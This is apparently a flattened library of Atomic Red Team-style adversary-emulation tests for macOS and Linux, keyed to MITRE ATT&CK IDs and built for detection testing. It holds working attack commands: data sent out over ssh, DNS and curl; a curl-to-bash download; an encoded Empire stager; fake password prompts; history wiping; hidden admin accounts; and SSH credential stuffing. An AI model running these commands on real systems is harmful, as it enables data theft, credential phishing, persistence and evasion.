T1005
sh
macos
Copy Apple Notes database files using AppleScript
Data from Local System
This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
T1007
sh
macos
System Service Discovery - macOS launchctl
System Service Discovery
Enumerates services on macOS using launchctl. Used by adversaries for identifying daemons, background services, and persistence mechanisms.
launchctl list
T1016
sh
macos, linux
System Network Configuration Discovery
System Network Configuration Discovery
Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout.
if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
T1016
bash
elevated
macos
List macOS Firewall Rules
System Network Configuration Discovery
This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. Using defaults, additional arguments can be added to see filtered details, such as globalstate for global configuration ("Is it on or off?"), firewall for common application allow rules, and explicitauths for specific rules configured by the user. Using socketfilterfw, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
T1016.001
bash
macos, linux
Check internet connection using ping freebsd, linux or macos
Internet Connection Discovery
Check internet connection using ping on Linux and macOS. The default target of the ping is 8.8.8.8 (Google Public DNS).
ping -c 4 #{ping_target}
T1018
sh
linux, macos
Remote System Discovery - arp nix
Remote System Discovery
Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
arp -a | grep -v '^?'
T1018
sh
linux, macos
Remote System Discovery - sweep
Remote System Discovery
Identify remote systems via ping sweep. Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
T1021.005
sh
elevated
macos
Enable Apple Remote Desktop Agent
VNC
ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer. Adversaries can abuse ARD to gain remote code execution and perform lateral movement. References: https://www.mandiant.com/resources/blog/leveraging-apple-remote-desktop-for-good-and-evil
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -quiet
T1027
sh
macos, linux
Decode base64 Data into Script
Obfuscated Files or Information
Creates a base64-encoded data file and decodes it into an executable shell script. Upon successful execution, sh will execute art.sh, which is a base64-encoded command that echoes "Hello from the Atomic Red Team" and runs uname -v.
if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh
T1027.001
sh
linux, macos
Pad Binary to Change Hash - Linux/macOS dd
Binary Padding
Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash. Upon successful execution, dd will modify /tmp/evil-binary, therefore the expected hash will change.
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
T1027.001
sh
linux, macos
Pad Binary to Change Hash using truncate command - Linux/macOS
Binary Padding
Uses truncate to add a byte to the binary to change the hash. Upon successful execution, truncate will modify /tmp/evil-binary, therefore the expected hash will change.
truncate -s +1 #{file_to_pad} #adds a byte to the file size
T1027.002
sh
macos
Binary simply packed by UPX
Software Packing
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied.
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
T1027.002
sh
macos
Binary packed by UPX, with modified headers
Software Packing
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (0x55505821, "UPX!") was changed to (0x4c4f5452, "LOTR"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more.
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
Compile After Delivery
Compile a C file with either gcc or clang on FreeBSD, Linux or macOS.
gcc #{input_file} && ./a.out
clang #{input_file} && ./a.out
Compile After Delivery
Compile a C++ file with either g++ or clang++ on FreeBSD, Linux or macOS.
g++ #{input_file} && ./a.out
clang++ #{input_file} && ./a.out
Compile After Delivery
Compile a Go file with the Go toolchain on FreeBSD, Linux or macOS.
go run #{input_file}
T1027.013
powershell
windows, macos, linux
Decode Eicar File and Write to File
Encrypted/Encoded File
Decode the eicar value, and write it to file, for AV/EDR to try to catch.
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
T1027.013
powershell
windows, macos, linux
Decrypt Eicar File and Write to File
Encrypted/Encoded File
Decrypt the eicar value, and write it to file, for AV/EDR to try to catch.
$encryptedString = "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"
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
T1027.013
bash
linux, macos
Password-Protected ZIP Payload Extraction and Execution
Encrypted/Encoded File
Extracts and executes a script from a password-protected ZIP archive. This technique is commonly used by malware families like Emotet and QBot to deliver payloads via email attachments where the password is provided in the message body. The encrypted ZIP evades static file analysis until extracted at runtime. Upon successful execution, displays confirmation and system information.
echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh
T1030
sh
macos, linux
Data Transfer Size Limits
Data Transfer Size Limits
Take a file/directory and split it into 5 MB chunks.
cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}
T1033
sh
linux, macos
System Owner/User Discovery
System Owner/User Discovery
Identify the system owner or users on an endpoint. Upon successful execution, sh will print a list of usernames to stdout.
users
w
who
T1036.005
sh
macos, linux
Execute a process from a directory masquerading as the current parent directory
Match Legitimate Resource Name or Location
Create and execute a process from a directory masquerading as the current parent directory (... instead of normal ..)
mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"
T1036.006
manual
macos
Space After Filename (Manual)
Space after Filename
Space After Filename
T1036.006
sh
macos, linux
Space After Filename
Space after Filename
Space after filename.
mkdir -p /tmp/atomic-test-T1036.006
cd /tmp/atomic-test-T1036.006
mkdir -p 'testdirwithspaceend '
[ "$(uname)" = 'FreeBSD' ] && /bin/echo "#\!/bin/sh" > "testdirwithspaceend /init " && echo 'echo "print(\"running T1035.006 with space after filename to masquerade init\")" | python3.9' >> "testdirwithspaceend /init " && echo "exit" >> "testdirwithspaceend /init " || /usr/bin/echo -e "%d\na\n#!/usr/bin/perl\nprint \"running T1035.006 with space after filename to masquerade init\\n\";\nqx/cp \/usr\/bin\/perl 'init '/;\nqx/'.\/init ' -e 'sleep 5'/;\n.\nwq\n" | ed 'testdirwithspaceend /init ' >/dev/null
chmod +x 'testdirwithspaceend /init '
'./testdirwithspaceend /init '
Login Hook
Mac logon script
RC Scripts
Modify rc.common [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
T1037.005
sh
elevated
macos
Add file to Local Library StartupItems
Startup Items
Modify or create an file in /Library/StartupItems [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo touch /Library/StartupItems/EvilStartup.plist
T1037.005
bash
elevated
macos
Add launch script to launch daemon
Startup Items
Add launch script to /Library/StartupItems to launch agent [Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
sudo cp #{path_malicious_script} /Library/StartupItems/atomic.sh
sudo cp #{path_malicious_plist} /tmp/T1037_005_daemon.plist
sudo /Library/StartupItems/atomic.sh start
T1037.005
bash
elevated
macos
Add launch script to launch agent
Startup Items
Add launch script to /Library/StartupItems to launch agent [Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
sudo cp #{path_malicious_script} /Library/StartupItems/atomic.sh
sudo cp #{path_malicious_plist} /tmp/T1037_005_agent.plist
/Library/StartupItems/atomic.sh start
T1040
bash
elevated
macos
Packet Capture macOS using tcpdump or tshark
Network Sniffing
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
sudo tcpdump -c 5 -nnni #{interface}
if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
T1040
bash
elevated
macos
Packet Capture macOS using /dev/bpfN with sudo
Network Sniffing
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
sudo #{program_path} -i #{ifname} -t 3
T1040
bash
elevated
macos
Filtered Packet Capture macOS using /dev/bpfN with sudo
Network Sniffing
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
sudo #{program_path} -f -i #{ifname} -t 3
T1046
bash
linux, macos
Port Scan
Network Service Discovery
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046
sh
elevated
linux, macos
Port Scan Nmap
Network Service Discovery
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046
sh
elevated
linux, macos
Port Scan using nmap (Port range)
Network Service Discovery
Scan multiple ports to check for listening ports with nmap
nmap -Pn -sV -p #{port_range} #{host}
T1048
sh
macos, linux
Exfiltration Over Alternative Protocol - SSH
Exfiltration Over Alternative Protocol
Input a domain and test exfiltration over SSH, remote to local. Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) and write a tar.gz file.
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
T1048
sh
macos, linux
Exfiltration Over Alternative Protocol - SSH
Exfiltration Over Alternative Protocol
Input a domain and test exfiltration over SSH, local to remote. Upon successful execution, tar will compress the /Users/* directory, openssl will password-protect the archive, and ssh will write it to the remote host as Users.tar.gz.enc.
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
T1048
bash
macos, linux
Exfiltrate Data using DNS Queries via dig
Exfiltration Over Alternative Protocol
This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and making DNS queries via the dig command to a controlled DNS server.
dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com
T1048.002
bash
macos, linux
Exfiltrate data HTTPS using curl freebsd,linux or macos
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data over HTTPS using curl to the file share site file.io.
curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
T1048.003
manual
macos, linux
Exfiltration Over Alternative Protocol - HTTP
Exfiltration Over Unencrypted Non-C2 Protocol
A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltration on port 1337. Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
T1049
bash
linux, macos
System Network Connections Discovery via ss or lsof (Linux/MacOS)
System Network Connections Discovery
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049
sh
linux, macos
System Network Connections Discovery FreeBSD, Linux & MacOS
System Network Connections Discovery
Get a listing of network connections. Upon successful execution, sh will execute netstat and who -a. Results will output via stdout.
netstat
who -a
T1053.003
sh
linux, macos
Cron - Replace crontab with referenced file
Cron
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
T1053.003
bash
elevated
macos, linux
Cron - Add script to all cron subfolders
Cron
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
Keylogging
Utilizes a Swift script to log keystrokes to stdout. It runs for 5 seconds, then dumps the output to standard output. Input Monitoring is required. Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. Reference: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
swift #{swift_src} -keylog
T1056.002
bash
macos
AppleScript - Prompt User for Password
GUI Input Capture
Prompt User for Password (Local Phishing) Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
T1056.002
bash
macos
AppleScript - Spoofing a credential prompt using osascript
GUI Input Capture
Prompt user for password without requiring permissions to send Apple events to System Settings. https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer')
echo $PWD_SPOOF
T1057
sh
linux, macos
Process Discovery - ps
Process Discovery
Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
ps >> #{output_file}
ps aux >> #{output_file}
AppleScript
Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit. You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request. Reference: https://github.com/EmpireProject/Empire
osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\\\" | python &\""
T1059.004
sh
linux, macos
Create and Execute Bash Shell Script
Unix Shell
Creates and executes a simple sh script.
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004
sh
linux, macos
Command-Line Interface
Unix Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in /tmp/art-fish.txt.
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004
sh
linux, macos
Shell Creation using awk command
Unix Shell
In awk, the BEGIN rule runs before any input record is read or interpreted. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
awk 'BEGIN {system("/bin/sh &")}'
T1059.004
sh
linux, macos
Creating shell using cpan command
Unix Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
T1059.004
sh
elevated
linux, macos
emacs spawning an interactive system shell
Unix Shell
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1069.001
sh
linux, macos
Permission Groups Discovery (Local)
Local Groups
Permission Groups Discovery
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
if [ -x "$(command -v id)" ]; then id; else echo "id is missing from the machine. skipping..."; fi;
if [ -x "$(command -v getent)" ]; then getent group; else echo "getent is missing from the machine. skipping..."; fi;
cat /etc/group
T1070.003
sh
linux, macos
Clear Bash history (rm)
Clear Command History
Clears bash history via rm
rm #{history_path}
T1070.003
sh
linux, macos
Clear Bash history (cat dev/null)
Clear Command History
Clears bash history via cat /dev/null
cat /dev/null > #{history_path}
T1070.003
sh
linux, macos
Clear Bash history (ln dev/null)
Clear Command History
Clears bash history via a symlink to /dev/null
ln -sf /dev/null #{history_path}
T1070.003
sh
linux, macos
Clear history of a bunch of shells
Clear Command History
Clears the history of a bunch of different shell types by setting the history size to zero
unset HISTFILE
export HISTFILESIZE=0
history -c
T1070.003
bash
linux, macos
Clear and Disable Bash History Logging
Clear Command History
Clears the history and disables bash history logging for the current shell and future shell sessions.
set +o history
echo 'set +o history' >> ~/.bashrc
. ~/.bashrc
history -c
T1070.003
sh
linux, macos
Use Space Before Command to Avoid Logging to History
Clear Command History
Using a space before a command causes the command to not be logged in the Bash History file
hostname
whoami
T1070.004
sh
linux, macos
Delete a single file - FreeBSD/Linux/macOS
File Deletion
Delete a single file from the temporary directory
rm -f #{file_to_delete}
T1070.004
sh
linux, macos
Delete an entire folder - FreeBSD/Linux/macOS
File Deletion
Recursively delete the temporary directory and all files contained within it
rm -rf #{folder_to_delete}
T1070.006
sh
linux, macos
Set a file's access timestamp
Timestomp
Stomps on the access timestamp of a file
touch -a -t 197001010000.00 #{target_filename}
T1070.006
sh
linux, macos
Set a file's modification timestamp
Timestomp
Stomps on the modification timestamp of a file
touch -m -t 197001010000.00 #{target_filename}
T1070.006
sh
elevated
linux, macos
Set a file's creation timestamp
Timestomp
Stomps on the creation timestamp of a file. Setting the creation timestamp requires changing the system clock and reverting it. Sudo or root privileges are required to change the date. Use with caution.
NOW=$(date +%m%d%H%M%Y)
date 010100001971
touch #{target_filename}
date "$NOW"
stat #{target_filename}
T1070.006
sh
linux, macos
Modify file timestamps using reference file
Timestomp
Modifies the modify and access timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers.
touch #{target_file_path}
touch -acmr #{reference_file_path} #{target_file_path}
T1070.006
sh
macos
MacOS - Timestomp Date Modified
Timestomp
Stomps on the modification timestamp of a file using macOS's SetFile utility.
SetFile -m #{target_date} #{target_filename}
T1070.008
bash
elevated
macos
Copy and Delete Mailbox Data on macOS
Clear Mailbox Data
Copies and deletes mail data on macOS
mkdir ~/Library/Mail/copy
cp -R ~/Library/Mail/* ~/Library/Mail/copy
rm -rf ~/Library/Mail/copy/*
T1070.008
bash
elevated
macos
Copy and Modify Mailbox Data on macOS
Clear Mailbox Data
Copies and modifies mail data on macOS
mkdir ~/Library/Mail/copy
cp -R ~/Library/Mail/* ~/Library/Mail/copy
echo "Manipulated data" > ~/Library/Mail/copy/manipulated.txt
T1071.001
sh
linux, macos
Malicious User Agents - Nix
Web Protocols
This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
T1074.001
sh
linux, macos
Stage data from Discovery.sh
Local Data Staging
Utilize curl to download discovery.sh and execute a basic information gathering shell script
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}
T1078.001
sh
elevated
macos
Enable Guest Account on macOS
Default Accounts
This test enables the guest account on macOS using sysadminctl utility.
sudo sysadminctl -guestAccount on
T1078.003
bash
elevated
macos
Create local account with admin privileges - MacOS
Local Accounts
After execution the new account will be active and added to the Administrators group
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser
T1078.003
bash
elevated
macos
Create local account with admin privileges using sysadminctl utility - MacOS
Local Accounts
After execution the new account will be active and added to the Administrators group
sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
T1078.003
bash
elevated
macos
Enable root account using dsenableroot utility - MacOS
Local Accounts
After execution the current/new user will have root access
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user
T1078.003
bash
elevated
macos
Add a new/existing user to the admin group using dseditgroup utility - macOS
Local Accounts
After execution the current/new user will be added to the Admin group
dseditgroup -o edit -a art-user -t user admin
T1082
sh
macos
System Information Discovery
System Information Discovery
Identify System Info
system_profiler
ls -al /Applications
T1082
sh
linux, macos
List OS Information
System Information Discovery
Identify System Info
uname -a >> #{output_file}
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi
if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi
uptime >> #{output_file}
cat #{output_file} 2>/dev/null
T1082
sh
linux, macos
Hostname Discovery
System Information Discovery
Identify system hostname for FreeBSD, Linux and macOS systems.
hostname
T1082
sh
linux, macos
Environment variables discovery on freebsd, macos and linux
System Information Discovery
Identify all environment variables. Upon execution, environment variables and your path info will be displayed.
env
T1082
sh
macos
Show System Integrity Protection status (MacOS)
System Information Discovery
Read and display System Integrity Protection status. csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.
csrutil status
T1082
sh
macos
sysctl to gather macOS hardware info
System Information Discovery
Gets the macOS hardware information, which can be used to determine whether the target macOS host is running on a physical or virtual machine. sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.
sysctl -n hw.model
T1083
sh
linux, macos
Nix File and Directory Discovery
File and Directory Discovery
Find or discover files on the file system References: http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ https://perishablepress.com/list-files-folders-recursively-terminal/
ls -a >> #{output_file}
if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;
file */* *>> #{output_file}
cat #{output_file} 2>/dev/null
find . -type f
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
locate *
which sh
T1083
sh
linux, macos
Nix File and Directory Discovery 2
File and Directory Discovery
Find or discover files on the file system
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
find . -type f -iname *.pdf >> #{output_file}
cat #{output_file}
find . -type f -name ".*"
T1087.001
sh
elevated
linux, macos
View sudoers access
Local Account
(requires root)
if [ -f /etc/sudoers ]; then sudo cat /etc/sudoers > #{output_file}; fi;
if [ -f /usr/local/etc/sudoers ]; then sudo cat /usr/local/etc/sudoers > #{output_file}; fi;
cat #{output_file}
T1087.001
sh
linux, macos
View accounts with UID 0
Local Account
View accounts with UID 0
grep 'x:0:' /etc/passwd > #{output_file}
grep '*:0:' /etc/passwd >> #{output_file}
cat #{output_file} 2>/dev/null
T1087.001
sh
linux, macos
List opened files by user
Local Account
List opened files by user
username=$(id -u -n) && lsof -u $username
T1087.001
sh
linux, macos
Enumerate users and groups
Local Account
Utilize groups and id to enumerate users and groups
groups
id
T1087.001
sh
macos
Enumerate users and groups
Local Account
Utilize local utilities to enumerate users and groups
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
dscacheutil -q group
dscacheutil -q user
Internal Proxy
Enable traffic redirection. Note that this test may conflict with pre-existing system configuration.
export #{proxy_scheme}_proxy=#{proxy_server}:#{proxy_port}
curl #{test_url}
T1090.001
sh
macos
Connection Proxy for macOS UI
Internal Proxy
Enable traffic redirection on macOS UI (not terminal). The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. Note that this test may conflict with pre-existing system configuration.
networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}
networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}
Multi-hop Proxy
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched.
osascript -e 'tell application "Terminal" to do script "tor"'
T1098.004
sh
linux, macos
Modify SSH Authorized Keys
SSH Authorized Keys
Modify the contents of <user-home>/.ssh/authorized_keys to maintain persistence on the victim host. The test reads the file and writes the same contents back; if that succeeds, the current user can modify the file, which is all an adversary needs in order to append their own key.
if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo "$ssh_authorized_keys" > ~/.ssh/authorized_keys; fi;
T1105
sh
elevated
linux, macos
rsync remote file copy (push)
Ingress Tool Transfer
Utilize rsync to perform a remote file copy (push)
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
T1105
sh
linux, macos
rsync remote file copy (pull)
Ingress Tool Transfer
Utilize rsync to perform a remote file copy (pull)
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
T1105
sh
linux, macos
scp remote file copy (push)
Ingress Tool Transfer
Utilize scp to perform a remote file copy (push)
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
T1105
sh
linux, macos
scp remote file copy (pull)
Ingress Tool Transfer
Utilize scp to perform a remote file copy (pull)
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
T1105
bash
linux, macos
sftp remote file copy (push)
Ingress Tool Transfer
Utilize sftp to perform a remote file copy (push)
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
T1105
sh
linux, macos
sftp remote file copy (pull)
Ingress Tool Transfer
Utilize sftp to perform a remote file copy (pull)
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
T1105
sh
linux, macos
whois file download
Ingress Tool Transfer
Download a remote file using the whois utility
timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
T1105
sh
macos
File download via nscurl
Ingress Tool Transfer
Use nscurl to download and write a file/payload from the internet. -k disables certificate checking; -o sets the output destination.
nscurl -k "#{remote_file}" -o "#{destination_path}"
T1110.004
bash
macos
SSH Credential Stuffing From MacOS
Credential Stuffing
Uses username:password pairs from a password dump to log in over SSH with sshpass.
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1113
bash
macos
Screencapture
Screen Capture
